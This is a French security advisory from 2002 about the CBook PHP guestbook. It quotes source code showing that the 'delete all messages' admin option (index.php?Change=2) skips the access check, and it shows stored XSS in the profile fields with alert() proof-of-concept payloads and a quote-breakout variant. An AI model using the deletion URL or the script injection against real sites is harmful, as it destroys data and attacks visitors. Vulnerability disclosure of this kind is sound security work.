CBook
					*****

Produit :
*********
CBook 

Versions :
**********
V.1.0.1 Beta (et autres ?)

Date :
******
12/04/02

Problemes :
***********
- Accès à une option admin
- XSS

Developpement :
***************

Il y a dans ce script 3 options admin :
Change=0, supprimer un message
Change=1, editer un message
Change=2, supprimer tout les messages

Ces options se trouvent dans index.php (donc index.php?Change=0, etc...).
Le fichier verifiant si on est bien admin se nomme accesscontrol.php.
On peut ainsi voir, dans index.php,
pour Change=0 :
-----------------------------

<? 
endif;

elseif ($Change == "0"):

include("accesscontrol.php"); // Sécurité !


if(!isset($name)):

?>
-----------------------------

pour Change=1 :
-----------------------------
<?
elseif($Change == "1"):
include("accesscontrol.php"); // Sécurité !

if(!isset($name)): 

?>
-----------------------------

et enfin pour Change=2 :
-----------------------------
<?

elseif($Change == "2" ):
?>
<link rel="stylesheet" type="text/css" href="style.css" />  	// Securité ??
<title>CBook V.1</title>
<center>
<body>
<?
include("vars.php");
$sql = mysql_connect($host,$user,$password) or die("Cannot connect to MySQL database!");
$sql = mysql_select_db($database) or die("Cannot open database $database!");
$sql = mysql_query("DELETE FROM guestbook") or die ("Cannot delete from DB!");

?>

ALL ENTRIES DELETED!
<br>
-----------------------------

L'option Change=2 n'inclut donc pas accesscontrol.php .
Cette option est par conséquent ouverte à tous : tout le monde, en tapant index.php?Change=2
dans son browser, peut supprimer l'entiereté des messages postés.


Une autre faille est présente dans les profils, une faille XSS (cross site scripting).
En effet, si on met un script dans chaque case à remplir du profil, tous seront executés,
et cela donnera une source du style :

-----------------------------------------------------------
Name: <script>alert('name')</script> 

<p>

Age: <script>alert('age')</script>
<p>

Location: <script>alert('location')</script> 

<p>

Website: <a href="<script>alert('site')</script>"> <script>alert('site')</script> </a> 

<p>

E-Mail: <a href="<script>alert('mail')</script>"> <script>alert('mail')</script> </a>

<p>

Comments: <script>alert('comment')</script><p>
-----------------------------------------------------------

Remarquons que si on met, pour E-Mail ou Website un "> de plus, le script sera
executé 2 fois pour chaque, car ça donnera une source du style :

<a href=""><script>ANYSCRIPT</script> "> "><script>ANYSCRIPT</script></a>

Patch :
*******
/

Greetz :
********
/

Credits :
*********
frog-m@n
leseulfrog@hotmail.com